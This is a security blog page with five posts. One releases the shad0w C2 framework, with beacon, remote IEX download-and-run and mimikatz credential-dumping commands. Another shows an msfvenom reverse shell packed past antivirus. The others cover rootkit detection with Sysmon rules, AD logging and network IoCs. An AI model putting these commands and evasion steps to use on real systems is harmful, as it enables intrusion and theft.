shad0w

Posted by bats3c on June 3rd, 2020

This project can be found on github

Post exploitation is large part of a red team engagement. While many organisations begin to mature and start to deploy a range of sophisticated Endpoint Detection & Response solutions (EDR) onto their networks, it requires us, as attackers to also mature. We need to upgrade our arsenal to give us the capabilities to successfully operate on their networks. That is why today, I am releasing shad0w.

shad0w is a post exploitation framework which is designed to operate covertly on such networks, providing the operator with much greater control over their engagements. Over future blog posts I will go into greater detail on the intricacies of how shad0w works. This blog post will, therefore, serve as an introduction into the usage and features that shad0w has to offer.

Overview & Install

shad0w is designed to be run inside docker, this is to make life easier for the operator as it has some very specific dependencies which are required for it to work correctly. Installation is very simple, just requiring the two commands shown below.

$ git clone https://github.com/bats3c/shad0w.git && cd shad0w
$ sudo ./shad0w install

Getting a foothold

shad0w implants are called beacons. There are two types of beacons: secure and insecure. Secure beacons are designed to operate in environments where it is vital to remain undetected whereas insecure beacons are for environments where the security is much more relaxed.

Currently there are 3 different formats for beacons: exe, shellcode and powershell. The shellcode and powershell formats allow for shad0w to be used in completely fileless attacks allowing everything to be run entirely inside memory.

To generate such a payload you can use the command shown below, this will place the payload of a statically linked secure beacon in beacon.ps1

$ shad0w beacon -p x64/windows/secure/static -H your.redirector -f psh -o beacon.ps1

The next steps would be to start the C2 server. When starting the C2 it will need to be given the address that the beacon will connect to. So if you are using redirectors it would not be the address of the C2 but rather the address of your first redirector. The command for starting a C2 instance for the beacons to callback to is shown below

$ shad0w listen -e your.redirector

A feature which could also be useful is the C2 servers ability to live proxy and essentially clone a website. This feature can be used with the --mirror or -m flag. This example would mirror the site https://www.bbc.com/ to the address of your redirector https://your.redirector/

$ shad0w listen -e your.redirector -m "https://www.bbc.com/"

So then when you visit your redirector you are given https://www.bbc.com/. This will also proxy any links you click or files you download which are on the site you have mirrored.

Now that your C2 is up and running you can execute the beacon. I will use an example of how you can do so with powershell but due to the beacon being in shellcode form, you can quite easily execute the beacon from many other languages.

PS> IEX (New-Object System.Net.WebClient).DownloadString("https://another.redirector/beacon.ps1")

And we get a callback

Enumeration

Now that we have a active session on the machine we can interact with it via the beacons command.

shad0w ≫ beacons -i 1

shad0w has some useful commands that can be used to explore and interact with the local file system e.g ls cd pwd rm cat mkdir while also letting you upload and download files.

One of the most useful features of shad0w is that it allows you to execute any .NET assembly, EXE, DLL, VBS, JS or XSL file in memory on the target without anything touching disk. For example to execute the .NET assembly seatbelt.exe in memory you can use the execute command, giving the file name with the -f flag and any arguments with the -p flag

shad0w ≫ execute -f seatbelt.exe -p all

All the output from the command will be sent back to your terminal window

Privilege Escalation

I have designed shad0w to be very modular, allowing operators to create and use their own modules. I have kept this philosophy in mind when making the elevate command. I designed it to help elevate the current beacons privileges by using common privilege escalation techniques & exploits all of which are stored in easy to use modules, allowing an operator to create new or build on existing modules easily.

To list the available privesc modules for the current session you can use the --list or -l flag

shad0w ≫ elevate --list

Modules come in two different modes, check and exploit. To run a modules in check mode use the --check or -c flags and to use a module in exploit mode use the --use or -u flags.

shad0w ≫ elevate --check system_printspoofer
shad0w ≫ elevate --use system_printspoofer

If an exploit is successful you will receive a new session from a beacon with elevate privileges

Modules

As I previously said, shad0w is designed to be very modular making the creation of new modules not much of a challenge. To showcase this I’ve added a mimikatz module. It will be executed inside memory like any module you decide to run but it should never be run over a secure beacon. This is because by design mimikatz is not very operationally secure so any half decent EDR should catch it very quickly. It is very much a welcome addition to the insecure beacons though.

This module can be used with the mimikatz command.

shad0w ≫ mimikatz -x sekurlsa::logonpasswords

Any other mimikatz commands can also by run by using the -x flag.

Defenses

In future blog posts I will be going into a lot more detail into how these defenses work in the secure beacon – but here’s a quick overview.

Currently shad0w uses 3 main defences:

  • Dynamic in memory code execution
  • Directly using syscalls
  • Anti DLL injection

Dynamic in memory code execution

This is achieved by safely hijacking alertable threads in a running processes and injecting the modules directly into them. This can help to avoid Sysmon’s event ID 8, which can be used to detect process injection.

Directly using syscalls

By directly using native windows syscalls, shad0w is able to avoid any userland API hooks placed by EDR solutions. This will greatly reduce their ability to monitor shad0w.

Anti DLL injection

The main method EDR solutions use to hook and monitor programs is by injecting a DLL into running processes allowing them to watch the inner workings of a program. This is currently combated by two methods: enforcing that only Microsoft signed DLLs are allowed into child processes (not many EDR DLLs are signed by Microsoft) and also by maintaining a whitelist of DLLs that are allowed into processes and blocking all others. This ensures that even if a DLL is signed by Microsoft it will still not be able to enter any of the processes.

Stay Up To Date

This is a constantly evolving project under active development. There are lots of exciting new features going to be added over the coming weeks so make sure you stay up to date with the lastest changes on this project’s GitHub.

A Defender’s Guide For Rootkit Detection: Episode 1 – Kernel Drivers

Posted by rootkid8 on April 20th, 2020

Author: Thom (@rootkid8), Sysmon Mastery Help from Rana (@sec_coffee)

Introduction

Even before my birth, rootkits have been one of the most sophisticated and successful ways of obtaining persistence on a machine, and now in 2020 there are ever more trivial ways of escalating from system to kernel. Recently JUMPSEC’s youngest red team researcher @_batsec_ raised the bar once more using rootkit techniques to universally evade Sysmon. This method of defeating Event Tracing for Windows is an incredible feat and the world of Windows logging is left shaken. As a result, we’re going to go down the rabbit hole of kernel driver rootkits, specifically looking at the use of vulnerable kernel drivers to escalate to ring-zero. First we need to start with some basics, how the Windows kernel implements defence-in-depth, how to bypass these restrictions, and how network defenders and system administrators can detect these techniques as “trivially” as attackers can implement them (skip to the end for a Sysmon Config). 

Some OS Basics

For those of us who don’t know, operating systems and common CPU’s define hierarchical protection domains to implement defense in depth. Code executing on the CPU is run in one of these rings using CPU modes – with ring 3 being user-land and ring 0 being kernel-land. 

Only certain applications that require access to low level devices and hardware should be allowed access to run code in rings 2, 1 and 0, which is enforced at a microcode level on the CPU as well as by the operating system. In theory this privilege domain is sound, and its introduction expelled the days of causing total system crashes with one line of buggy code in user-land. However, the implementation of these rings at the operating system level, and worse-so at the driver level is reasonably vague and undocumented, opening up an entire space for kernel driver exploits as post exploitation privilege escalation and persistence mechanisms. 

Writing a Kernel Mode Driver

We’re going to look more closely at how Windows handles device drivers, since these drivers allow access to kernel space, we will hopefully uncover some of the ways to get arbitrary code to run in kernel mode without the use of a signed driver. Heck, writing a kernel mode driver isn’t a particularly challenging task, but if you want it to run on a target system it will require setting up “Test Mode” on the operating system or completely disabling device driver signing enforcement (DSE) globally which requires access to the boot settings, or through running the following command followed by a reboot:

bcdedit /set testsigning on

Both of these techniques are about as stealthy as using a sledgehammer to hide the noise of your power drill, and not only will most ordinary users recognise the Test Mode warning on their device, many organisations restrict this functionality group wide, and if they don’t then they really should. There is of course a way to hide the watermarks and warnings, but again this is a sledgehammer approach since bcdedit will be caught by a blue team with any real level of sophistication.

Instead, we need to bypass Driver Signature Enforcement and PatchGuard, both of which being Windows kernel protection mechanisms. One to prevent unsigned drivers being loaded and another to prevent drivers from modifying critical kernel data structures through integrity checks. Again, any blue team should be able to detect the loading of a driver with an expired certificate – SwiftOnSecurity’s handy Sysmon config will anyway!

The Story of One Kernel Driver Loader…

In order to explore these kernel mode drivers, we need to take a trip back in time. There used to be (and still are) some fantastic base projects for kernel mode drivers like the ones we’re investigating. Written by a legend in this space @hfiref0x – we’ll start with TDL or Turla Driver Loader. Around 4 years ago, this tool was a rootkit developer’s wet dream. It’s the supercedent to DSEFix, another driver loader written by hfiref0x, that became obsolete due to its modification of kernel variables that got blocked by PatchGuard rendering it a guaranteed blue screen generator – a fun prank but not what we’re looking for. 

TDL acts as a fully functional driver loader that can be used independently of the Windows loader. As a byproduct it defeats 64-bit driver signature enforcement as well. The magic of Turla is the offensive technique it uses to get a custom driver to load into kernel memory. It comes packaged with a vulnerable version of a VirtualBox kernel mode driver, it loads and exploits this driver to overwrite kernel memory with a custom crafted driver before jumping to the DriverEntry function to begin execution. Effectively this can be visualised as so:

This technique is somewhat akin to process hollowing, but instead of creating a suspended thread and mapping our code into it, we load a known driver and use shellcode to map our malicious code into that segment of memory.

The technique is surprisingly simple, but extremely effective. Since the VirtualBox driver runs in kernel mode already, by dropping shellcode that now runs in kernel land we can execute an mmov, an mmap, and a jump (in reality it’s much more complex than that but just for simplicity’s sake we rely on those three instructions). This means that all the target kernel driver needs is permission to read and write physical memory, and have a code execution CVE for it to become a candidate for kernel driver loading.

Clearly hfiref0x doesn’t sleep, and soon after TDL, Stryker was released, yet another kernel driver loader. This time the loader was crafted to exploit a CPU-Z driver instead, functioning very similarly to its predecessor. Now again in 2020,  hfiref0x strikes again with the release of Kernel Driver Utility (KDU) just 2 months ago, the same concept is being used, except now KDU supports multiple vulnerable drivers as “functionality providers”. Hilariously named, these functionality providers are the keys to the kingdom, and if we have any hopes of detecting rootkits that use this technique we need to understand how KDU loads these drivers, how it exploits them, and what breadcrumbs we can search for on systems to check for compromise.

Looking briefly at the Github attributes we can see there are 4 CVE’s associated with the project:

With more providers mentioned in the README:

  • ATSZIO64 driver from ASUSTeK WinFlash utility of various versions;
  • GLCKIO2 (WinIo) driver from ASRock Polychrome RGB of version 1.0.4;
  • EneIo (WinIo) driver from G.SKILL Trident Z Lighting Control of version 1.00.08;
  • WinRing0x64 driver from EVGA Precision X1 of version 1.0.2.0;
  • EneTechIo (WinIo) driver from Thermaltake TOUGHRAM software of version 1.0.3.

The most notable thing regarding these vulnerabilities is that they all expose ring-zero code execution capabilities, enabling the entire kill-chain of KDU. Even more interestingly  CVE-2019-16098 even states in the description: These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. 

As a disclaimer, we can note that hfiref0x states KDU and all similar tools are not actually hacking tools, they are for driver developers to make their lives easier. A lazy AV will flag this tool as malware, but also because in many senses of the word, KDU is malware in the same way a remote access tool for sysadmins can be malware.

Static Analysis 

[WARNING: RABBIT HOLE AHEAD]

If you’re not interested in KDU source code or boring operating system details then skip to Dynamic Analysis.

Examining the source code of KDU we see an abstraction layer that is implemented by the driver loader, each provider has the following structure:

144 typedef struct _KDU_PROVIDER {                          
…………………………………………………
161     struct {
162         provRegisterDriver RegisterDriver; //optional
163         provUnregisterDriver UnregisterDriver; //optional
164
165         provAllocateKernelVM AllocateKernelVM; //optional
166         provFreeKernelVM FreeKernelVM; //optional
167
168         provReadKernelVM ReadKernelVM;
169         provWriteKernelVM WriteKernelVM;
170
171         provVirtualToPhysical VirtualToPhysical; //optional
172         provReadControlRegister ReadControlRegister; //optional
173     
174         provQueryPML4 QueryPML4Value; //optional
175         provReadPhysicalMemory ReadPhysicalMemory; //optional
176         provWritePhysicalMemory WritePhysicalMemory; //optional
177     } Callbacks;
178 } KDU_PROVIDER, * PKDU_PROVIDER;

I’ve ignored the unimportant fields, but from here we can understand what it takes to construct a provider, and we can see there are function pointers required for:

  • reading and writing virtual memory, 
  • mapping virtual addresses to physical addresses, 
  • reading and writing physical addresses 
  • reading two kernel registers – the PML4 and the Control Register

It should be pretty clear so far why we need to be able to read and write physical and virtual memory addresses, but what are the PML4 and the control register and why does the exploit require them? Well if you’re familiar with Linux kernels then the PML4 is simply the base address to the multi-level page table that the kernel uses to map linear virtual address spaces to processes. In order to replace our driver in memory we need to be able to find where it’s stored in memory which requires reading from the page table to find the address space of the target driver. Hence we can read this base address from the PML4 register. 

The control register should also be familiar to kernel developers or assembly folks, but to those of you who don’t know – it’s a 64-bit register that has a few important use cases required by virtual memory mapping and paging. In cases where either no function is defined for mapping virtual memory to physical memory, and nothing for reading the PML4, KDU uses the control register value to find the page directory address. This allows it to translate virtual addresses to physical addresses so it can walk through the page table and overwrite physical kernel memory regions:

 39  BOOL PwVirtualToPhysical(
 40     _In_ HANDLE DeviceHandle,
 41     _In_ provQueryPML4 QueryPML4Routine,
 42     _In_ provReadPhysicalMemory ReadPhysicalMemoryRoutine,
 43     _In_ ULONG_PTR VirtualAddress,
 44     _Out_ ULONG_PTR* PhysicalAddress)
 45 {   
 46     ULONG_PTR   pml4_cr3, selector, table, entry = 0;
 47     INT         r, shift;
 48     
 49     *PhysicalAddress = 0;
 50     
 51     if (QueryPML4Routine(DeviceHandle, &pml4_cr3) == 0)
 52         return 0;
 53     
 54     table = pml4_cr3 & PHY_ADDRESS_MASK;
 55     
 56     for (r = 0; r < 4; r++) {
 57         
 58         shift = 39 - (r * 9);
 59         selector = (VirtualAddress >> shift) & 0x1ff;
 60         
 61         if (ReadPhysicalMemoryRoutine(DeviceHandle,
 62             table + selector * 8,
 63             &entry,
 64             sizeof(ULONG_PTR)) == 0)
 65         {   
 66             return 0;
 67         }
 68         
 69         if (PwEntryToPhyAddr(entry, &table) == 0)
 70             return 0;
 71         
 72         if ((r == 2) && ((entry & ENTRY_PAGE_SIZE_BIT) != 0)) {
 73             table &= PHY_ADDRESS_MASK_2MB_PAGES;
 74             table += VirtualAddress & VADDR_ADDRESS_MASK_2MB_PAGES;
 75             *PhysicalAddress = table;
 76             return 1;
 77         }
 78     }
 79     
 80     table += VirtualAddress & VADDR_ADDRESS_MASK_4KB_PAGES;
 81     *PhysicalAddress = table;

Digging deeper into the source code we actually discover that there are two drivers at play here: a victim driver and a vulnerable driver. Initially I presumed these to be the same driver, but the code appears to unpack, load and start the vulnerable driver first – this is the provider – after which it calls KDUMapDriver which tries to load the victim driver.

In the case of KDU, the victim driver is always the process explorer PROCEXP152.sys driver, it bootstraps shellcode into the IRP_MJ_DEVICE_CONTROL callback of PROCEXP152, before finally unloading it, triggering the shellcode to execute inside PROCEXP152, allowing the target driver to be loaded into kernel memory.

Finally, let’s take a look at the core loader functionality, we want to understand the shellcode bootstrapping, and the system calls used to help us figure out what level of detection is possible. This snippet of code is where the bootstrapping happens inside KDUSetupShellCode:

382         //
383         // Resolve import (ntoskrnl only) and write buffer to registry.
384         //
385         isz = FileHeader->OptionalHeader.SizeOfImage;
386
387         DataBuffer = supHeapAlloc(isz);
388         if (DataBuffer) {
389             RtlCopyMemory(DataBuffer, Image, isz);
390
391             printf_s("[+] Resolving kernel import for input driver\r\n");
392             supResolveKernelImport((ULONG_PTR)DataBuffer, KernelImage, KernelBase);
393             
394             lResult = RegOpenKey(HKEY_LOCAL_MACHINE, NULL, &hKey);
395             if ((lResult == ERROR_SUCCESS) && (hKey != NULL)) {
396
397                 lResult = RegSetKeyValue(hKey, NULL, TEXT("~"), REG_BINARY,                                        
398                     DataBuffer, isz);
399
400                 bSuccess = (lResult == ERROR_SUCCESS);
401
402                 RegCloseKey(hKey);
403             }
404             supHeapFree(DataBuffer);
405         }
406     }

We see that first it finds the ntoskrnl.exe base address – this is the starting address space of the kernel mapped memory region, containing important structures such as the page directory of mapped memory for all processes on the system. This is important because most process monitoring tools should be able to detect if this image is loaded. After this it calls KDUStorePayload on the driver filename passed to it – interestingly this function writes a byte buffer that is just the raw bytes of the rootkit.sys (or whatever input kernel mode driver you specify) to a registry hive in HKLM with the key “~”:

[4d5a is hex for MZ also known as the magic bytes in the header of a PE image.]

A fun part of this registry write is that KDU doesn’t clean up after itself so this artifact remains on the system as an IOC even after KDU’s removal. I’ve thrown together a little powershell script that you can find in the appendix for incident responders to check whether any PE data has been written to registry keys. It will detect KDU in it’s default state as well as any basic attempts at KDU modifications that change the target hive, and any other tools that write executable data to the registry.

Furthermore, we come across this function call inside VictimBuildName in victim.cpp that writes the victim driver .sys in the %TEMP% directory:

 61 LPWSTR VictimBuildName(
 62     _In_ LPWSTR VictimName
 63 )
 64 {
 65     LPWSTR FileName;
 66     SIZE_T Length = (1024 + _strlen(VictimName)) * sizeof(WCHAR);
 67
 68     FileName = (LPWSTR)supHeapAlloc(Length);
 69     if (FileName == NULL) {
 70         SetLastError(ERROR_NOT_ENOUGH_MEMORY);
 71     }
 72     else {
 73
 74         DWORD cch = supExpandEnvironmentStrings(L"%temp%\\", FileName, MAX_PATH);
 75         if (cch == 0 || cch > MAX_PATH) {
 76             SetLastError(ERROR_NOT_ENOUGH_MEMORY);
 77             supHeapFree(FileName);
 78             FileName = NULL;
 79         }
 80         else {
 81             _strcat(FileName, VictimName);
 82             _strcat(FileName, L".sys");
 83         }
 84     }
 85
 86     return FileName;
 87 }

This is exciting, as file writes are also solid ways of detecting malicious activity, especially if the write operations are hardcoded into the executable and not generated on the fly or randomly.

Dynamic Analysis

Now that we have some potential indicators of execution for KDU from the source code: registry writes, files writes and image loads, we’re going to write some tests to see how this works in practice. To test these providers, I compiled KDU from source, wrote a custom kernel mode driver that acts as a tiny example rootkit, and wrote a batch script to execute kdu -map -prv <ID> rootkit.sys repeatedly with each of the providers in sequence. In each case we analyse the changes made to the system, in this example we’ll be using Procmon, and Sysmon.

The procmon test shows a pretty clear pattern of events demonstrated by the following diagram:

Using our custom Sysmon config, we also see the following events traced by Sysmon: 

  1. Create %TEMP%\PROVIDER.sys 
  2. Set HKLM\System\CurrentControlSet\Services\PROVIDER\Start registry value to 3 (Manual Start)
  3. Set HKLM\System\CurrentControlSet\Services\PROVIDER\ImagePath to %TEMP%\PROVIDER.sys
  4. DRIVER LOADED: PROVIDER.sys
  5. Create %CD%\PROCEXP152.sys
  6. Set HKLM\System\CurrentControlSet\Services\PROCEXP152\Start registry value to 3 (Manual Start)
  7. Set HKLM\System\CurrentControlSet\Services\PROCEXP152\ImagePath to %CD%\PROCEXP152.sys
  8. DRIVER LOADED: PROCEXP152.sys
  9. Unsigned Image loaded rootkit.sys

This makes more sense if we understand that the registry values in HKLM\System\CurrentControlSet\Services\<Driver>\ are set and unset when Windows services are loaded, and these actions aren’t actually performed by the KDU code directly. Instead these events can be read as:

  1. Unpack vulnerable (provider) driver to %CD%
  2. Start it
  3. Write rootkit binary data to HKLM\~ registry hive
  4. Unpack victim driver (PROCEXP152.sys) to %TEMP%
  5. Start it
  6. Unsigned rootkit kernel driver loaded into kernel memory

This is almost exactly the pattern evident from the source code, although we had to add an explicit rule to pick up the binary data in HKLM\~. What we can note here as well is that this entire process relies on the loading of a very particular version of a vulnerable driver – this means it’ll have a particular hash which we could also use as a signature, as well as the final event – an unsigned driver still gets loaded into memory is the biggest telltale sign of something suspicious happening.

Conclusion

Now, obviously we could have just executed KDU right at the start of this and obtained the IOC’s instantly, but where’s the fun in that? Instead you should now understand one fairly general technique for elevating from system to kernel, the inner workings of kernel level driver loaders (and the many similar tools using this technique), as well as how we can detect them. 

These detection techniques aren’t particularly sophisticated however, and nothing prevents an adversary from patching or tweaking these variables so KDU writes to different registry hives or disk locations. Or worse yet, making it load the victim and vulnerable drivers from memory instead of dumping them to disk first, in which case we would only see the starting and stopping of the vulnerable and victim driver services. Then simply patching the vulnerable drivers with arbitrary null bytes before loading them would modify the hashes detected by Sysmon. Such is life in cybersecurity… In part 2 we’re going to look at some more sophisticated evasion techniques that rootkits use, and how we can detect those too, so stay tuned!

The supporting work in this area is my only credit, people like @hfiref0x, @fuzzysec, and of course our dude @_batsec_ constantly finding ways to break the Windows kernel and invalidate the integrity of our operating systems is one of the many wonders of this world. 

Appendix

  1. Some sysmon rules for detecting KDU and similar tools (the DriverLoad and ImageLoad events may require you to update your exclusion filters) as the vulnerable drivers that get loaded often appear legitimate and are even signed by Microsoft in the case of PROCEXP152.sys.
<Sysmon schemaversion="4.23">
    <EventFiltering>
        <RuleGroup name="" groupRelation="or">
            <DriverLoad onmatch="include">
                <ImageLoaded condition="contains" name="MITRE_REF=T1014,NAME=Rootkit">Temp\PROCEXP152.sys</ImageLoaded>
                <Hashes condition="is" name="MITRE_REF=T1014,NAME=Rootkit">C06DDA757B92E79540551EFD00B99D4B</Hashes>
            </DriverLoad>
        </RuleGroup>
        <RuleGroup name="" groupRelation="or">
            <ImageLoad onmatch="include">
                <Signed name="MITRE_REF=T1014,NAME=Rootkit" condition="is">false</Signed>
                <ImageLoaded name="MITRE_REF=T1014,NAME=Rootkit" condition="is">C:\Windows\System32\ntoskrnl.exe</ImageLoaded>
            </ImageLoad>
        </RuleGroup>
        <RuleGroup name="" groupRelation="and">
            <FileCreate onmatch="include">
                <TargetFilename name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">\AppData\Local\Temp\PROCEXP152.sys</TargetFilename>
            </FileCreate>
<FileCreate onmatch="exclude">
                <Image condition="contains">procexp64.exe</Image>
                <Image condition="contains">procexp.exe</Image>
                <Image condition="contains">procmon64.exe</Image>
                <Image condition="contains">procmon.exe</Image>
            </FileCreate>
        </RuleGroup>
        <RuleGroup name="" groupRelation="or">
            <RegistryEvent onmatch="include">
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">PROCEXP152\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">RTCore64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">Gdrv\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">ATSZIO\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">MsIo64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">MsIo\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">GLCKIo2\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">EneIo64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">EneIo\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">WinRing0x64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">WinRing0_1_2_0\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">EneTechIo64\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">EneTechIo\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">NalDrv\ImagePath</TargetObject>
                <TargetObject name="MITRE_REF=T1014,NAME=Rootkit" condition="contains">HKLM\~</TargetObject>
            </RegistryEvent>
        </RuleGroup>
    </EventFiltering>
</Sysmon>
  1. A basic PowerShell script for incident responders to help perform analysis on target machines. The script simply recurses through the entire HKLM registry space and checks for any executable data (by checking the PE header magic bytes and length of the entry).

https://gist.github.com/thomjs/e7c5f6087ff646acf32dae89e9c7ecf2

References

  1. https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
  2. https://github.com/hfiref0x/KDU/
  3. https://swapcontext.blogspot.com/2020/01/unwinding-rtcore.html
  4. https://eclypsium.com/wp-content/uploads/2019/08/EXTERNAL-Get-off-the-kernel-if-you-cant-drive-DEFCON27.pdf
  5. https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities 
  6. https://www.fuzzysecurity.com/tutorials/expDev/23.html

Bypassing Antivirus with Golang – Gopher it!

Posted by warden on June 20th, 2019

In this blog post, we’re going to detail a cool little trick we came across on how to bypass most antivirus products to get a Metepreter reverse shell on a target host. This all started when we came across a Github repository written in Golang, which on execution could inject shellcode into running processes. By simply generating a payload with msfvenom we tested it and found that it was easily detected by Windows Defender. The Meterpreter payload was generated as follows:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -b \x00 -f hex

The perk of using Go for this experiment is that it can be cross-compiled, from a Linux host for a target Windows host. The command to compile the application was:

GOOS=windows GOARCH=amd64 go build

This would produce a Go exe which would be executed from the command line, along with the shellcode the attacker wanted to inject. This was easily detected, and Windows Defender identified it as Meterpreter without any trouble. As a quick and easy bypass, we tried to compress the executable using UPX in brute mode, which repeatedly compresses it 8 times. No luck here either, as Windows Defender caught it again.

Fig.1- Attempting to run the Go exe file with the shellcode as an argument. As you can see it was easily detected by Windows Defender. We then tried with the UPX compressed sc.exe file, which also didn’t work.

Fig.2 – Of course, the Meterpreter session is killed as soon as the process is detected by Windows Defender.

From here we inspected the source code of the Go program. After some review, we discovered that the main.go source file could be modified to take the shellcode as a variable then compiled – instead of compiling the .exe then adding the shellcode as a command line argument.

Fig.3 – The go-shellcode/cmd/sc/main.go source.

Fig.4 – The modified go-shellcode/cmd/sc/main.go source, where the reference to a command line argument is substituted for a declared variable.

With these we compiled two .exe files, one to be tested without UPX compression, and one with UPX compression. Windows Defender detects the non-compressed version as soon as it touches disk, but does not detect the UPX compressed .exe with static analysis.

Fig.5 – The .exe with no UPX compression is instantly detected as containing a Meterpreter payload by Windows Defender. No dice.

Running the custom UPX compressed .exe file is successful however, and a reverse shell is achieved!

Fig.6 – Running the UPX compressed Go exe file is successful, and a reverse shell is achieved on the victim’s machine.

Fantastic. Let’s run it against VT to check how loud the signature for this is.

Fig.7 – Uploading the UPX compressed Go exe file to Virus Total. Only Cybereason and Cylance detect the file as being malicious.

Only two antivirus engines are picking up that there is a malicious payload in this file, and both of them don’t specify what exactly about the upload is malicious, just that it IS malicious. The UPX compression is likely what’s triggering the alert, as UPX compression can be used to obfuscate malicious files.

Fig.8 – UPX compression in brute mode compresses the exe file 8 times.

And that’s it! In this blog post we detailed how we modified a great Go program from Github (resource listed below) that performed shellcode injection into one that efficiently evaded most antivirus programs.

The gist for this is available here

Reference:

https://github.com/brimstone/go-shellcode

https://boyter.org/posts/trimming-golang-binary-fat/

https://blog.filippo.io/shrink-your-go-binaries-with-this-one-weird-trick/

Enhanced logging to detect common attacks on Active Directory– Part 1

Posted by bugzBunny on February 6th, 2019


In this blog post I am going to tackle the topic of detecting common attacks using Active Directory logs. It is important to understand the power of data in InfoSec world. Too much data means you’ll be spending rest of the week digging through millions of log entries to try and figure out what the adversary was up to. You can set filters to help you through this, however it can get computationally expensive very fast depending on how your filters operate. It also requires you to know what to specifically look out for! You need to have confidence in your filters and test them thoroughly from time to time to make sure they actually work.


On the other hand, too little data means you might not have enough log entries to investigate and provide full evidence of what malicious techniques were attempted. For this reason, it is a constant battle of finding the middle ground of having hard evidence and not overwhelming your SIEM. Another golden question to ask is: are we even logging the correct events?


One of the ways to get around this problem is configuring the correct Group Policies on the Domain Controllers. In this blog post I want to focus solely on command line logging because it is a quick win and it shows immense amount of detail into what processes and commands are executed. We start off by enabling the correct settings in the Group Policy using Group Policy Editor. The steps are detailed below:




  • Follow the path Policies → Administrative Templates → System → Audit Process Creation. And enable “include command line in process creation events”


  • Follow the path Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Audit Policies → System Audit Policies → Detailed Tracking. And enable both Successful and Failure configuration for “Audit Process Creation” and “Audit Process Termination” as shown below.


After configuring these settings, run the good old group policy update on command prompt as administrator using the command gpupdate /force. At this point, you should be able to see all commands being executed via command prompt.


We can test this by running some commands and viewing the logs to verify as shown below by running some test commands. We can see that by running test commands event ID 4688 (New process created) event is generated showing what was typed in the command prompt.





Now, we can move forward and test this with the psexec module from Metasploit using the exploit/windows/smb/psexec module as shown below.




After setting the correct parameters, we execute the exploit and observe the logs produced from this action.




Now this will generate a lot of events and keeping up with the incoming logs using Windows Event Viewer will be almost impossible. The best way to analyse these events is to parse these events through a SIEM solution for better log management. After everything is set up correctly, we can now begin the hunt! Monitoring the recent activity on the target machine, we see some interesting events:


  • Event ID 7045 – A service was installed in the system

The details around this event shows that the service named yReAMNiNjOyqeWQI was installed by the user root (which we know is the user used for this exploit). There are some interesting parameters defined here such as -nop, -hidden and -noni


Such parameters can be used for obfuscation purposes. However, it becomes harder to detect these obfuscation parameters with keyword matching when there are multiple valid execution argument aliases for them. For example, for -NoProfile argument alone, argument substrings such as -NoP, -NoPr -NoPro, -NoProf, -NoProfi and -NoProfil are all valid! This is where we chuck keyword matching filters out of the window and look towards regular expressions for detection.


Focusing more on the name of the service being installed (yReAMNiNjOyqeWQI) looks like gibberish which is exactly what it is. Looking at the source code of the psexec module for Metasploit framework, we see that the display name is essentially 16 character long random text! We just found another possible filter that could help us detect these types of exploits.


Furthermore, we can also see a new process created (with event ID 4688) which logs the actual command being executed during this attack!


Do you remember the thing we did with the group policies earlier? It wasn’t just to fill this blog post with random text and screenshots…nope… instead setting those group policies accordingly will allow you to log what was executed in command prompt as shown above! This is very useful in monitoring what crazy things are being executed on your windows network.


That’s all for now, I hope you found this helpful as well as interesting. In the next part of this blog post series I will reveal more ingesting detection techniques.

Short introduction to Network Forensics and Indicators of Compromise (IoC)

Posted by XoN on June 28th, 2016

Indicator of compromise (IOC) in computer forensics is an artifact observed on a network or in an operating system that with high confidence indicates a computer intrusion. Typical IOCs are virus signatures and IP addresses, MD5 hashes of malware files or URLs or domain names of botnet command and control servers. After IOCs have been identified in a process of incident response and computer forensics, they can be used for early detection of future attack attempts using intrusion detection systems and antivirus software.Wikipedia

Hello w0rld! In this post I am planning to do a brief introduction into network forensics and how network monitoring can be used to identify successful attacks. Network monitoring is essential in order to identify reconnaissance activities such as port scans but also for identifying successful attacks such as planted malware (such as ransomware) or spear-phishing. Generally when doing network forensics the network footprint is of significant importance since it allows us to replicate the timeline of events. With that said, network footprint can still be obscured/hidden by using cryptographic means such as point-2-point encryption. Even if you can’t see the actual traffic because it is encrypted, what you can see is the bandwidth load which might be an IoC.

In incident response the first step is the time that is needed for the attack realization. If the attack is not realized then of course there is no ‘incident response’ (doh!). There is a list of things that the analyst should go over in order to try to identify if an attack was successful. The list is not definite and there are far more things that need to be checked than those discussed here.
Whether an attack is targeted or non-targeted, if it is utilizing the Internet connection in any way it will leave network footprints behind. In targeted attacks we see things like spear-phishing and USB planting that quite often are targeting susceptible individuals with lack of security awareness. Non-targeted attacks might include attack vectors such as malware, ransomware, malicious javascripts, flash exploits, etc. This is not exhausting since flash exploits and malicious javascripts can be used also in a targeted fashion.
By identifying the Indicators of Compromise (IoC), we can have briefly describe each attack vector as follows depending on the network footprint that will have:

  • IP addresses
  • domain names
  • DNS resolve requests/response
  • downloadable malicious content (javascripts, flash, PDF files with embedded scripts, DOCX with Macros enabled)

